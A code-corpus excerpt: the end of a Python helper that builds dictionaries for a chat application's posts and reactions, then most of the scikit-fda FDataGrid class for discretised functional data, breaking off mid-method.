user_id\n chat_participants = {}\n chat_participants[\"user_id\"] = chatParticipant[0]\n chat_participants[\"username\"] = chatParticipant[1]\n chat_participants[\"first_name\"] = chatParticipant[2]\n chat_participants[\"last_name\"] = chatParticipant[3]\n return chat_participants\n\n\n# Dict used for demo\ndef chat_admin_dict(chatAdmin):\n # chat_id, user_id\n admin = {}\n admin[\"admin\"] = chatAdmin[0]\n admin[\"first_name\"] = chatAdmin[1]\n 
admin[\"last_name\"] = chatAdmin[2]\n return admin\n\n\ndef post_dict(chatPost):\n # post_id, post_msg, post_date, post_time, user_id, chat_id\n post = {}\n post[\"post_id\"] = chatPost[0]\n post[\"post_msg\"] = chatPost[1]\n post[\"post_date\"] = chatPost[2]\n post[\"user_id\"] = chatPost[3]\n post[\"chat_id\"] = chatPost[4]\n return post\n\n\ndef reaction_dict(postReaction):\n # user_id, post_id, react_date, react_time, react_type\n reaction = {}\n reaction[\"user_id\"] = postReaction[0]\n reaction[\"post_id\"] = postReaction[1]\n reaction[\"react_date\"] = postReaction[1]\n reaction[\"react_type\"] = postReaction[2]\n return reaction\n\n\n# Dict used for demo\ndef reaction_user_dict(joinReaction):\n # user_id, first_name, last_name, react_date\n reaction_user = {}\n reaction_user[\"user_id\"] = joinReaction[0]\n reaction_user[\"username\"] = joinReaction[1]\n reaction_user[\"first_name\"] = joinReaction[2]\n reaction_user[\"last_name\"] = joinReaction[3]\n reaction_user[\"react_date\"] = joinReaction[4]\n return reaction_user\n\n\ndef hashtag_dict(postHashtag):\n # hashtag_id, hashtag_text, post_id\n hashtag = {}\n hashtag[\"hashtag_id\"] = postHashtag[0]\n hashtag[\"hashtag_text\"] = postHashtag[1]\n hashtag[\"post_id\"] = postHashtag[2]\n return hashtag\n\n\ndef dashboard_hashtag_dict(postHashtag):\n # hashtag_text\n hashtag = {}\n hashtag[\"hashtag_text\"] = postHashtag[0]\n hashtag[\"Total\"] = postHashtag[1]\n return hashtag\n\n\ndef media_dict(postMedia):\n # media_id, post_id, media_type, location\n media = {}\n media[\"media_id\"] = postMedia[0]\n media[\"post_id\"] = postMedia[1]\n media[\"media_type\"] = postMedia[2]\n media[\"location\"] = postMedia[3]\n return media\n\n\ndef reply_dict(postReply):\n # reply_id, reply_msg, reply_date, reply_time, user_id, post_id\n reply = {}\n reply[\"reply_id\"] = postReply[0]\n reply[\"reply_msg\"] = postReply[1]\n reply[\"reply_date\"] = postReply[2]\n reply[\"reply_username\"] = postReply[3]\n return reply\n\n\ndef post_per_day_dict(post):\n # reply_id, reply_msg, reply_date, reply_time, user_id, post_id\n postPerDay = {}\n postPerDay[\"day\"] = post[0]\n postPerDay[\"total\"] = post[1]\n return postPerDay\n","sub_path":"handler/DictBuilder.py","file_name":"DictBuilder.py","file_ext":"py","file_size_in_byte":6333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"167436411","text":"\"\"\"Discretised functional data module.\n\nThis module defines a class for representing functional data as a series of\nlists of values, each representing the observation of a function measured in a\nlist of discretisation points.\n\n\"\"\"\n\nimport copy\nimport numbers\nimport warnings\nfrom typing import Any\n\nimport findiff\nimport numpy as np\nimport pandas.api.extensions\nimport scipy.stats.mstats\n\nfrom .._utils import (\n _check_array_key,\n _domain_range,\n _int_to_real,\n _tuple_of_arrays,\n constants,\n)\nfrom . 
import basis as fdbasis\nfrom ._functional_data import FData\nfrom .interpolation import SplineInterpolation\n\n__author__ = \"Miguel Carbajo Berrocal\"\n__email__ = \"miguel.carbajo@estudiante.uam.es\"\n\n\nclass FDataGrid(FData):\n r\"\"\"Represent discretised functional data.\n\n Class for representing functional data as a set of curves discretised\n in a grid of points.\n\n Attributes:\n data_matrix (numpy.ndarray): a matrix where each entry of the first\n axis contains the values of a functional datum evaluated at the\n points of discretisation.\n grid_points (numpy.ndarray): 2 dimension matrix where each row\n contains the points of dicretisation for each axis of data_matrix.\n domain_range (numpy.ndarray): 2 dimension matrix where each row\n contains the bounds of the interval in which the functional data\n is considered to exist for each one of the axies.\n dataset_name (str): name of the dataset.\n argument_names (tuple): tuple containing the names of the different\n arguments.\n coordinate_names (tuple): tuple containing the names of the different\n coordinate functions.\n extrapolation (str or Extrapolation): defines the default type of\n extrapolation. By default None, which does not apply any type of\n extrapolation. See `Extrapolation` for detailled information of the\n types of extrapolation.\n interpolation (GridInterpolation): Defines the type of interpolation\n applied in `evaluate`.\n\n Examples:\n Representation of a functional data object with 2 samples\n representing a function :math:`f : \\mathbb{R}\\longmapsto\\mathbb{R}`,\n with 3 discretization points.\n\n >>> data_matrix = [[1, 2, 3], [4, 5, 6]]\n >>> grid_points = [2, 4, 5]\n >>> FDataGrid(data_matrix, grid_points)\n FDataGrid(\n array([[[ 1.],\n [ 2.],\n [ 3.]],\n \n [[ 4.],\n [ 5.],\n [ 6.]]]),\n grid_points=(array([ 2., 4., 5.]),),\n domain_range=((2.0, 5.0),),\n ...)\n\n The number of columns of data_matrix have to be the length of\n grid_points.\n\n >>> FDataGrid(np.array([1,2,4,5,8]), range(6))\n Traceback (most recent call last):\n ....\n ValueError: Incorrect dimension in data_matrix and grid_points...\n\n\n FDataGrid support higher dimensional data both in the domain and image.\n Representation of a functional data object with 2 samples\n representing a function :math:`f : \\mathbb{R}\\longmapsto\\mathbb{R}^2`.\n\n >>> data_matrix = [[[1, 0.3], [2, 0.4]], [[2, 0.5], [3, 0.6]]]\n >>> grid_points = [2, 4]\n >>> fd = FDataGrid(data_matrix, grid_points)\n >>> fd.dim_domain, fd.dim_codomain\n (1, 2)\n\n Representation of a functional data object with 2 samples\n representing a function :math:`f : \\mathbb{R}^2\\longmapsto\\mathbb{R}`.\n\n >>> data_matrix = [[[1, 0.3], [2, 0.4]], [[2, 0.5], [3, 0.6]]]\n >>> grid_points = [[2, 4], [3,6]]\n >>> fd = FDataGrid(data_matrix, grid_points)\n >>> fd.dim_domain, fd.dim_codomain\n (2, 1)\n\n \"\"\"\n\n class _CoordinateIterator:\n \"\"\"Internal class to iterate through the image coordinates.\"\"\"\n\n def __init__(self, fdatagrid):\n \"\"\"Create an iterator through the image coordinates.\"\"\"\n self._fdatagrid = fdatagrid\n\n def __iter__(self):\n \"\"\"Return an iterator through the image coordinates.\"\"\"\n\n for i in range(len(self)):\n yield self[i]\n\n def __getitem__(self, key):\n \"\"\"Get a specific coordinate.\"\"\"\n\n s_key = key\n if isinstance(s_key, int):\n s_key = slice(s_key, s_key + 1)\n\n coordinate_names = np.array(\n self._fdatagrid.coordinate_names)[s_key]\n\n return self._fdatagrid.copy(\n data_matrix=self._fdatagrid.data_matrix[..., key],\n 
coordinate_names=coordinate_names)\n\n def __len__(self):\n \"\"\"Return the number of coordinates.\"\"\"\n return self._fdatagrid.dim_codomain\n\n def __init__(self, data_matrix, grid_points=None,\n *,\n sample_points=None,\n domain_range=None,\n dataset_label=None,\n dataset_name=None,\n argument_names=None,\n coordinate_names=None,\n sample_names=None,\n axes_labels=None, extrapolation=None,\n interpolation=None):\n \"\"\"Construct a FDataGrid object.\n\n Args:\n data_matrix (array_like): a matrix where each row contains the\n values of a functional datum evaluated at the\n points of discretisation.\n grid_points (array_like, optional): an array containing the\n points of discretisation where values have been recorded or a\n list of lists with each of the list containing the points of\n dicretisation for each axis.\n domain_range (tuple or list of tuples, optional): contains the\n edges of the interval in which the functional data is\n considered to exist (if the argument has 2 dimensions each\n row is interpreted as the limits of one of the dimension of\n the domain).\n dataset_label (str, optional): name of the dataset.\n axes_labels (list, optional): list containing the labels of the\n different axes. The length of the list must be equal to the sum\n of the number of dimensions of the domain plus the number of\n dimensions of the image.\n \"\"\"\n if sample_points is not None:\n warnings.warn(\"Parameter sample_points is deprecated. Use the \"\n \"parameter grid_points instead.\",\n DeprecationWarning)\n grid_points = sample_points\n\n self.data_matrix = _int_to_real(np.atleast_2d(data_matrix))\n\n if grid_points is None:\n self.grid_points = _tuple_of_arrays(\n [np.linspace(0., 1., self.data_matrix.shape[i]) for i in\n range(1, self.data_matrix.ndim)])\n\n else:\n # Check that the dimension of the data matches the grid_points\n # list\n\n self.grid_points = _tuple_of_arrays(grid_points)\n\n data_shape = self.data_matrix.shape[1: 1 + self.dim_domain]\n grid_points_shape = [len(i) for i in self.grid_points]\n\n if not np.array_equal(data_shape, grid_points_shape):\n raise ValueError(\"Incorrect dimension in data_matrix and \"\n \"grid_points. 
Data has shape {} and grid \"\n \"points have shape {}\"\n .format(data_shape, grid_points_shape))\n\n self._sample_range = np.array(\n [(s[0], s[-1]) for s in self.grid_points])\n\n if domain_range is None:\n domain_range = self.sample_range\n # Default value for domain_range is a list of tuples with\n # the first and last element of each list of the grid_points.\n\n self._domain_range = _domain_range(domain_range)\n\n if len(self._domain_range) != self.dim_domain:\n raise ValueError(\"Incorrect shape of domain_range.\")\n\n for i in range(self.dim_domain):\n if (self._domain_range[i][0] > self.grid_points[i][0]\n or self._domain_range[i][-1] < self.grid_points[i]\n [-1]):\n raise ValueError(\"Sample points must be within the domain \"\n \"range.\")\n\n # Adjust the data matrix if the dimension of the image is one\n if self.data_matrix.ndim == 1 + self.dim_domain:\n self.data_matrix = self.data_matrix[..., np.newaxis]\n\n self.interpolation = interpolation\n\n super().__init__(extrapolation=extrapolation,\n dataset_label=dataset_label,\n dataset_name=dataset_name,\n axes_labels=axes_labels,\n argument_names=argument_names,\n coordinate_names=coordinate_names,\n sample_names=sample_names)\n\n def round(self, decimals=0):\n \"\"\"Evenly round to the given number of decimals.\n\n Args:\n decimals (int, optional): Number of decimal places to round to.\n If decimals is negative, it specifies the number of\n positions to the left of the decimal point. Defaults to 0.\n\n Returns:\n :obj:FDataGrid: Returns a FDataGrid object where all elements\n in its data_matrix are rounded .The real and\n imaginary parts of complex numbers are rounded separately.\n\n \"\"\"\n return self.copy(data_matrix=self.data_matrix.round(decimals))\n\n @property\n def sample_points(self):\n warnings.warn(\"Parameter sample_points is deprecated. Use the \"\n \"parameter grid_points instead.\",\n DeprecationWarning)\n return self.grid_points\n\n @property\n def dim_domain(self):\n return len(self.grid_points)\n\n @property\n def dim_codomain(self):\n try:\n # The dimension of the image is the length of the array that can\n # be extracted from the data_matrix using all the dimensions of\n # the domain.\n return self.data_matrix.shape[1 + self.dim_domain]\n # If there is no array that means the dimension of the image is 1.\n except IndexError:\n return 1\n\n @property\n def coordinates(self):\n r\"\"\"Returns an object to access to the image coordinates.\n\n If the functional object contains multivariate samples\n :math:`f: \\mathbb{R}^n \\rightarrow \\mathbb{R}^d`, this class allows\n iterate and get coordinates of the vector\n :math:`f = (f_0, ..., f_{d-1})`.\n\n Examples:\n\n We will construct a dataset of curves in :math:`\\mathbb{R}^3`\n\n >>> from skfda.datasets import make_multimodal_samples\n >>> fd = make_multimodal_samples(dim_codomain=3, random_state=0)\n >>> fd.dim_codomain\n 3\n\n The functions of this dataset are vectorial functions\n :math:`f(t) = (f_0(t), f_1(t), f_2(t))`. We can obtain a specific\n component of the vector, for example, the first one.\n\n >>> fd_0 = fd.coordinates[0]\n >>> fd_0\n FDataGrid(...)\n\n The object returned has image dimension equal to 1\n\n >>> fd_0.dim_codomain\n 1\n\n Or we can get multiple components, it can be accesed as a 1-d\n numpy array of coordinates, for example, :math:`(f_0(t), f_1(t))`.\n\n >>> fd_01 = fd.coordinates[0:2]\n >>> fd_01.dim_codomain\n 2\n\n We can use this method to iterate throught all the coordinates.\n\n >>> for fd_i in fd.coordinates:\n ... 
fd_i.dim_codomain\n 1\n 1\n 1\n\n This object can be used to split a FDataGrid in a list with\n their components.\n\n >>> fd_list = list(fd.coordinates)\n >>> len(fd_list)\n 3\n\n \"\"\"\n\n return FDataGrid._CoordinateIterator(self)\n\n @property\n def n_samples(self):\n \"\"\"Return number of rows of the data_matrix. Also the number of samples.\n\n Returns:\n int: Number of samples of the FDataGrid object. Also the number of\n rows of the data_matrix.\n\n \"\"\"\n return self.data_matrix.shape[0]\n\n @property\n def ncol(self):\n \"\"\"Return number of columns of the data_matrix.\n\n Also the number of points of discretisation.\n\n Returns:\n int: Number of columns of the data_matrix.\n\n \"\"\"\n return self.data_matrix.shape[1]\n\n @property\n def sample_range(self):\n \"\"\"Return the edges of the interval in which the functional data is\n considered to exist by the sample points.\n\n Do not have to be equal to the domain_range.\n \"\"\"\n return self._sample_range\n\n @property\n def domain_range(self):\n \"\"\"Return the edges of the interval in which the functional data is\n considered to exist by the sample points.\n\n Do not have to be equal to the sample_range.\n \"\"\"\n return self._domain_range\n\n @property\n def interpolation(self):\n \"\"\"Defines the type of interpolation applied in `evaluate`.\"\"\"\n return self._interpolation\n\n @interpolation.setter\n def interpolation(self, new_interpolation):\n \"\"\"Sets the interpolation of the FDataGrid.\"\"\"\n if new_interpolation is None:\n new_interpolation = SplineInterpolation()\n\n self._interpolation = new_interpolation\n\n def _evaluate(self, eval_points, *, aligned=True):\n\n return self.interpolation.evaluate(self, eval_points,\n aligned=aligned)\n\n def derivative(self, *, order=1):\n r\"\"\"Differentiate a FDataGrid object.\n\n It is calculated using central finite differences when possible. In\n the extremes, forward and backward finite differences with accuracy\n 2 are used.\n\n Args:\n order (int, optional): Order of the derivative. Defaults to one.\n\n Examples:\n First order derivative\n\n >>> fdata = FDataGrid([1,2,4,5,8], range(5))\n >>> fdata.derivative()\n FDataGrid(\n array([[[ 0.5],\n [ 1.5],\n [ 1.5],\n [ 2. ],\n [ 4. 
]]]),\n grid_points=(array([ 0., 1., 2., 3., 4.]),),\n domain_range=((0.0, 4.0),),\n ...)\n\n Second order derivative\n\n >>> fdata = FDataGrid([1,2,4,5,8], range(5))\n >>> fdata.derivative(order=2)\n FDataGrid(\n array([[[ 3.],\n [ 1.],\n [-1.],\n [ 2.],\n [ 5.]]]),\n grid_points=(array([ 0., 1., 2., 3., 4.]),),\n domain_range=((0.0, 4.0),),\n ...)\n\n \"\"\"\n order_list = np.atleast_1d(order)\n if order_list.ndim != 1 or len(order_list) != self.dim_domain:\n raise ValueError(\"The order for each partial should be specified.\")\n\n operator = findiff.FinDiff(*[(1 + i, p, o)\n for i, (p, o) in enumerate(\n zip(self.grid_points, order_list))])\n data_matrix = operator(self.data_matrix.astype(float))\n\n if self.dataset_name:\n dataset_name = \"{} - {} derivative\".format(self.dataset_name,\n order)\n else:\n dataset_name = None\n\n fdatagrid = self.copy(data_matrix=data_matrix,\n dataset_name=dataset_name)\n\n return fdatagrid\n\n def __check_same_dimensions(self, other):\n if self.data_matrix.shape[1:-1] != other.data_matrix.shape[1:-1]:\n raise ValueError(\"Error in columns dimensions\")\n if not np.array_equal(self.grid_points, other.grid_points):\n raise ValueError(\"Sample points for both objects must be equal\")\n\n def sum(self, *, axis=None, out=None, keepdims=False, skipna=False,\n min_count=0):\n \"\"\"Compute the sum of all the samples.\n\n Returns:\n FDataGrid : A FDataGrid object with just one sample representing\n the sum of all the samples in the original object.\n\n Examples:\n\n >>> from skfda import FDataGrid\n >>> data_matrix = [[0.5, 1, 2, .5], [1.5, 1, 4, .5]]\n >>> FDataGrid(data_matrix).sum()\n FDataGrid(\n array([[[ 2.],\n [ 2.],\n [ 6.],\n [ 1.]]]),\n ...)\n\n \"\"\"\n super().sum(axis=axis, out=out, keepdims=keepdims, skipna=skipna)\n\n data = (np.nansum(self.data_matrix, axis=0, keepdims=True) if skipna\n else np.sum(self.data_matrix, axis=0, keepdims=True))\n\n if min_count > 0:\n valid = ~np.isnan(self.data_matrix)\n n_valid = np.sum(valid, axis=0)\n data[n_valid < min_count] = np.NaN\n\n return self.copy(data_matrix=data,\n sample_names=(None,))\n\n def var(self):\n \"\"\"Compute the variance of a set of samples in a FDataGrid object.\n\n Returns:\n FDataGrid: A FDataGrid object with just one sample representing the\n variance of all the samples in the original FDataGrid object.\n\n \"\"\"\n return self.copy(data_matrix=[np.var(self.data_matrix, 0)],\n sample_names=(\"variance\",))\n\n def cov(self):\n \"\"\"Compute the covariance.\n\n Calculates the covariance matrix representing the covariance of the\n functional samples at the observation points.\n\n Returns:\n numpy.darray: Matrix of covariances.\n\n \"\"\"\n\n if self.dataset_name is not None:\n dataset_name = self.dataset_name + ' - covariance'\n else:\n dataset_name = None\n\n if self.dim_domain != 1 or self.dim_codomain != 1:\n raise NotImplementedError(\"Covariance only implemented \"\n \"for univariate functions\")\n\n return self.copy(data_matrix=np.cov(self.data_matrix[..., 0],\n rowvar=False)[np.newaxis, ...],\n grid_points=[self.grid_points[0],\n self.grid_points[0]],\n domain_range=[self.domain_range[0],\n self.domain_range[0]],\n dataset_name=dataset_name,\n argument_names=self.argument_names * 2,\n sample_names=(\"covariance\",))\n\n def gmean(self):\n \"\"\"Compute the geometric mean of all samples in the FDataGrid object.\n\n Returns:\n FDataGrid: A FDataGrid object with just one sample representing\n the geometric mean of all the samples in the original\n FDataGrid object.\n\n \"\"\"\n 
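`FDataGrid.derivative` above delegates to findiff, building one `FinDiff` operator per domain axis from the grid points. A minimal standalone sketch of the same call on a 1-d uniform grid (findiff also accepts the coordinate array itself for non-uniform spacing, which appears to be what the record passes):

import numpy as np
import findiff

x = np.linspace(0.0, 1.0, 11)
f = x ** 2

d_dx = findiff.FinDiff(0, x[1] - x[0], 1)  # axis 0, spacing dx, order 1
print(d_dx(f))  # approximately 2*x at every grid point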
return self.copy(data_matrix=[\n scipy.stats.mstats.gmean(self.data_matrix, 0)],\n sample_names=(\"geometric mean\",))\n\n def equals(self, other):\n \"\"\"Comparison of FDataGrid objects\"\"\"\n if not super().equals(other):\n return False\n\n if not np.array_equal(self.data_matrix, other.data_matrix):\n return False\n\n if len(self.grid_points) != len(other.grid_points):\n return False\n\n for a, b in zip(self.grid_points, other.grid_points):\n if not np.array_equal(a, b):\n return False\n\n if not np.array_equal(self.domain_range, other.domain_range):\n return False\n\n if self.interpolation != other.interpolation:\n return False\n\n return True\n\n def __eq__(self, other):\n \"\"\"Elementwise equality of FDataGrid\"\"\"\n\n if not isinstance(self, type(other)) or self.dtype != other.dtype:\n if other is pandas.NA:\n return self.isna()\n if pandas.api.types.is_list_like(other) and not isinstance(\n other, (pandas.Series, pandas.Index, pandas.DataFrame),\n ):\n return np.concatenate([x == y for x, y in zip(self, other)])\n else:\n return NotImplemented\n\n if len(self) != len(other) and len(self) != 1 and len(other) != 1:\n raise ValueError(f\"Different lengths: \"\n f\"len(self)={len(self)} and \"\n f\"len(other)={len(other)}\")\n\n return np.all(self.data_matrix == other.data_matrix,\n axis=tuple(range(1, self.data_matrix.ndim)))\n\n def _get_op_matrix(self, other):\n if isinstance(other, numbers.Number):\n return other\n elif isinstance(other, np.ndarray):\n\n if other.shape == () or other.shape == (1,):\n return other\n elif other.shape == (self.n_samples,):\n other_index = ((slice(None),) + (np.newaxis,) *\n (self.data_matrix.ndim - 1))\n\n return other[other_index]\n else:\n return None\n\n elif isinstance(other, FDataGrid):\n self.__check_same_dimensions(other)\n return other.data_matrix\n else:\n return None\n\n def __add__(self, other):\n \"\"\"Addition for FDataGrid object.\n\n It supports other FDataGrid objects, numpy.ndarray and numbers.\n\n \"\"\"\n\n data_matrix = self._get_op_matrix(other)\n if data_matrix is None:\n return NotImplemented\n\n return self._copy_op(other, data_matrix=self.data_matrix + data_matrix)\n\n def __radd__(self, other):\n \"\"\"Addition for FDataGrid object.\n\n It supports other FDataGrid objects, numpy.ndarray and numbers.\n\n \"\"\"\n\n return self.__add__(other)\n\n def __sub__(self, other):\n \"\"\"Subtraction for FDataGrid object.\n\n It supports other FDataGrid objects, numpy.ndarray and numbers.\n\n \"\"\"\n data_matrix = self._get_op_matrix(other)\n if data_matrix is None:\n return NotImplemented\n\n return self._copy_op(other, data_matrix=self.data_matrix - data_matrix)\n\n def __rsub__(self, other):\n \"\"\"Right Subtraction for FDataGrid object.\n\n It supports other FDataGrid objects, numpy.ndarray and numbers.\n\n \"\"\"\n data_matrix = self._get_op_matrix(other)\n if data_matrix is None:\n return NotImplemented\n\n return self.copy(data_matrix=data_matrix - self.data_matrix)\n\n def __mul__(self, other):\n \"\"\"Multiplication for FDataGrid object.\n\n It supports other FDataGrid objects, numpy.ndarray and numbers.\n\n \"\"\"\n data_matrix = self._get_op_matrix(other)\n if data_matrix is None:\n return NotImplemented\n\n return self._copy_op(other, data_matrix=self.data_matrix * data_matrix)\n\n def __rmul__(self, other):\n \"\"\"Multiplication for FDataGrid object.\n\n It supports other FDataGrid objects, numpy.ndarray and numbers.\n\n \"\"\"\n return self.__mul__(other)\n\n def __truediv__(self, other):\n \"\"\"Division for 
FDataGrid object.\n\n It supports other FDataGrid objects, numpy.ndarray and numbers.\n\n \"\"\"\n data_matrix = self._get_op_matrix(other)\n if data_matrix is None:\n return NotImplemented\n\n return self._copy_op(other, data_matrix=self.data_matrix / data_matrix)\n\n def __rtruediv__(self, other):\n \"\"\"Division for FDataGrid object.\n\n It supports other FDataGrid objects, numpy.ndarray and numbers.\n\n \"\"\"\n data_matrix = self._get_op_matrix(other)\n if data_matrix is None:\n return NotImplemented\n\n return self._copy_op(other, data_matrix=data_matrix / self.data_matrix)\n\n def concatenate(self, *others, as_coordinates=False):\n \"\"\"Join samples from a similar FDataGrid object.\n\n Joins samples from another FDataGrid object if it has the same\n dimensions and sampling points.\n\n Args:\n others (:obj:`FDataGrid`): Objects to be concatenated.\n as_coordinates (boolean, optional): If False concatenates as\n new samples, else, concatenates the other functions as\n new components of the image. Defaults to false.\n\n Returns:\n :obj:`FDataGrid`: FDataGrid object with the samples from the\n original objects.\n\n Examples:\n >>> fd = FDataGrid([1,2,4,5,8], range(5))\n >>> fd_2 = FDataGrid([3,4,7,9,2], range(5))\n >>> fd.concatenate(fd_2)\n FDataGrid(\n array([[[ 1.],\n [ 2.],\n [ 4.],\n [ 5.],\n [ 8.]],\n \n [[ 3.],\n [ 4.],\n [ 7.],\n [ 9.],\n [ 2.]]]),\n grid_points=(array([ 0., 1., 2., 3., 4.]),),\n domain_range=((0.0, 4.0),),\n ...)\n\n \"\"\"\n # Checks\n if not as_coordinates:\n for other in others:\n self.__check_same_dimensions(other)\n\n elif not all([np.array_equal(self.grid_points, other.grid_points)\n for other in others]):\n raise ValueError(\"All the FDataGrids must be sampled in the same \"\n \"sample points.\")\n\n elif any([self.n_samples != other.n_samples for other in others]):\n\n raise ValueError(f\"All the FDataGrids must contain the same \"\n f\"number of samples {self.n_samples} to \"\n f\"concatenate as a new coordinate.\")\n\n data = [self.data_matrix] + [other.data_matrix for other in others]\n\n if as_coordinates:\n\n coordinate_names = [fd.coordinate_names for fd in [self, *others]]\n\n return self.copy(data_matrix=np.concatenate(data, axis=-1),\n coordinate_names=sum(coordinate_names, ()))\n\n else:\n\n sample_names = [fd.sample_names for fd in [self, *others]]\n\n return self.copy(data_matrix=np.concatenate(data, axis=0),\n sample_names=sum(sample_names, ()))\n\n def scatter(self, *args, **kwargs):\n \"\"\"Scatter plot of the FDatGrid object.\n\n Args:\n fig (figure object, optional): figure over with the graphs are\n plotted in case ax is not specified. If None and ax is also\n None, the figure is initialized.\n axes (list of axis objects, optional): axis over where the graphs\n are plotted. If None, see param fig.\n n_rows(int, optional): designates the number of rows of the figure\n to plot the different dimensions of the image. Only specified\n if fig and ax are None.\n n_cols(int, optional): designates the number of columns of the\n figure to plot the different dimensions of the image. 
Only\n                specified if fig and ax are None.\n            kwargs: keyword arguments to be passed to the\n                matplotlib.pyplot.scatter function;\n\n        Returns:\n            fig (figure): figure object in which the graphs are plotted.\n\n\n        \"\"\"\n        from ..exploratory.visualization.representation import plot_scatter\n\n        return plot_scatter(self, *args, **kwargs)\n\n    def to_basis(self, basis, **kwargs):\n        \"\"\"Return the basis representation of the object.\n\n        Args:\n            basis(Basis): basis object in which the functional data are\n                going to be represented.\n            **kwargs: keyword arguments to be passed to\n                FDataBasis.from_data().\n\n        Returns:\n            FDataBasis: Basis representation of the functional data\n                object.\n\n        Examples:\n            >>> import numpy as np\n            >>> import skfda\n            >>> t = np.linspace(0, 1, 5)\n            >>> x = np.sin(2 * np.pi * t) + np.cos(2 * np.pi * t) + 2\n            >>> x\n            array([ 3.,  3.,  1.,  1.,  3.])\n\n            >>> fd = FDataGrid(x, t)\n            >>> basis = skfda.representation.basis.Fourier(n_basis=3)\n            >>> fd_b = fd.to_basis(basis)\n            >>> fd_b.coefficients.round(2)\n            array([[ 2.  , 0.71, 0.71]])\n\n        \"\"\"\n        from ..preprocessing.smoothing import BasisSmoother\n\n        if self.dim_domain != basis.dim_domain:\n            raise ValueError(f\"The domain of the function has \"\n                             f\"dimension {self.dim_domain} \"\n                             f\"but the domain of the basis has \"\n                             f\"dimension {basis.dim_domain}\")\n        elif self.dim_codomain != basis.dim_codomain:\n            raise ValueError(f\"The codomain of the function has \"\n                             f\"dimension {self.dim_codomain} \"\n                             f\"but the codomain of the basis has \"\n                             f\"dimension {basis.dim_codomain}\")\n\n        # Readjust the domain range if there was not an explicit one\n        if basis._domain_range is None:\n            basis = basis.copy(domain_range=self.domain_range)\n\n        smoother = BasisSmoother(\n            basis=basis,\n            **kwargs,\n            return_basis=True)\n\n        return smoother.fit_transform(self)\n\n    def to_grid(self, grid_points=None, *, sample_points=None):\n        \"\"\"Return a copy of the object discretized at the given grid points.\"\"\"\n\n        if sample_points is not None:\n            warnings.warn(\"Parameter sample_points is deprecated. Use the \"\n                          \"parameter grid_points instead.\",\n                          DeprecationWarning)\n            grid_points = sample_points\n\n        if grid_points is None:\n            grid_points = self.grid_points\n\n        return self.copy(data_matrix=self.evaluate(grid_points, grid=True),\n                         grid_points=grid_points)\n\n    def copy(self, *,\n             deep=False,  # For Pandas compatibility\n             data_matrix=None,\n             grid_points=None,\n             sample_points=None,\n             domain_range=None,\n             dataset_name=None,\n             argument_names=None,\n             coordinate_names=None,\n             sample_names=None,\n             extrapolation=None,\n             interpolation=None):\n        \"\"\"Returns a copy of the FDataGrid.\n\n        If an argument is provided the corresponding attribute in the new copy\n        is updated.\n\n        \"\"\"\n\n        if sample_points is not None:\n            warnings.warn(\"Parameter sample_points is deprecated. 
Use the \"\n \"parameter grid_points instead.\",\n DeprecationWarning)\n grid_points = sample_points\n\n if data_matrix is None:\n # The data matrix won't be writeable\n data_matrix = self.data_matrix\n\n if grid_points is None:\n # Sample points won`t be writeable\n grid_points = self.grid_points\n\n if domain_range is None:\n domain_range = copy.deepcopy(self.domain_range)\n\n if dataset_name is None:\n dataset_name = self.dataset_name\n\n if argument_names is None:\n # Tuple, immutable\n argument_names = self.argument_names\n\n if coordinate_names is None:\n # Tuple, immutable\n coordinate_names = self.coordinate_names\n\n if sample_names is None:\n # Tuple, immutable\n sample_names = self.sample_names\n\n if extrapolation is None:\n extrapolation = self.extrapolation\n\n if interpolation is None:\n interpolation = self.interpolation\n\n return FDataGrid(data_matrix, grid_points=grid_points,\n domain_range=domain_range,\n dataset_name=dataset_name,\n argument_names=argument_names,\n coordinate_names=coordinate_names,\n sample_names=sample_names,\n extrapolation=extrapolation,\n interpolation=interpolation)\n\n def shift(self, shifts, *, restrict_domain=False, extrapolation=None,\n eval_points=None):\n \"\"\"Perform a shift of the curves.\n\n Args:\n shifts (array_like or numeric): List with the shifts\n corresponding for each sample or numeric with the shift to\n apply to all samples.\n restrict_domain (bool, optional): If True restricts the domain to\n avoid evaluate points outside the domain using extrapolation.\n Defaults uses extrapolation.\n extrapolation (str or Extrapolation, optional): Controls the\n extrapolation mode for elements outside the domain range.\n By default uses the method defined in fd. See extrapolation to\n more information.\n eval_points (array_like, optional): Set of points where\n the functions are evaluated to obtain the discrete\n representation of the object to operate. 
If an empty list the\n current grid_points are used to unificate the domain of the\n shifted data.\n\n Returns:\n :class:`FDataGrid` with the shifted data.\n \"\"\"\n\n if np.isscalar(shifts):\n shifts = [shifts]\n\n shifts = np.array(shifts)\n\n # Case unidimensional treated as the multidimensional\n if self.dim_domain == 1 and shifts.ndim == 1 and shifts.shape[0] != 1:\n shifts = shifts[:, np.newaxis]\n\n # Case same shift for all the curves\n if shifts.shape[0] == self.dim_domain and shifts.ndim == 1:\n\n # Column vector with shapes\n shifts = np.atleast_2d(shifts).T\n\n grid_points = self.grid_points + shifts\n domain_range = self.domain_range + shifts\n\n return self.copy(grid_points=grid_points,\n domain_range=domain_range)\n if shifts.shape[0] != self.n_samples:\n raise ValueError(f\"shifts vector ({shifts.shape[0]}) must have the\"\n f\" same length than the number of samples \"\n f\"({self.n_samples})\")\n\n if eval_points is None:\n eval_points = self.grid_points\n else:\n eval_points = np.atleast_2d(eval_points)\n\n if restrict_domain:\n domain = np.asarray(self.domain_range)\n a = domain[:, 0] - np.atleast_1d(np.min(np.min(shifts, axis=1), 0))\n b = domain[:, 1] - np.atleast_1d(np.max(np.max(shifts, axis=1), 0))\n\n domain = np.vstack((a, b)).T\n\n eval_points = [eval_points[i][\n np.logical_and(eval_points[i] >= domain[i, 0],\n eval_points[i] <= domain[i, 1])]\n for i in range(self.dim_domain)]\n\n else:\n domain = self.domain_range\n\n eval_points = np.asarray(eval_points)\n\n eval_points_repeat = np.repeat(eval_points[np.newaxis, :],\n self.n_samples, axis=0)\n\n # Solve problem with cartesian and matrix indexing\n if self.dim_domain > 1:\n shifts[:, :2] = np.flip(shifts[:, :2], axis=1)\n\n shifts = np.repeat(shifts[..., np.newaxis],\n eval_points.shape[1], axis=2)\n\n eval_points_shifted = eval_points_repeat + shifts\n\n data_matrix = self.evaluate(eval_points_shifted,\n extrapolation=extrapolation,\n aligned=False,\n grid=True)\n\n return self.copy(data_matrix=data_matrix, grid_points=eval_points,\n domain_range=domain)\n\n def compose(self, fd, *, eval_points=None):\n \"\"\"Composition of functions.\n\n Performs the composition of functions.\n\n Args:\n fd (:class:`FData`): FData object to make the composition. 
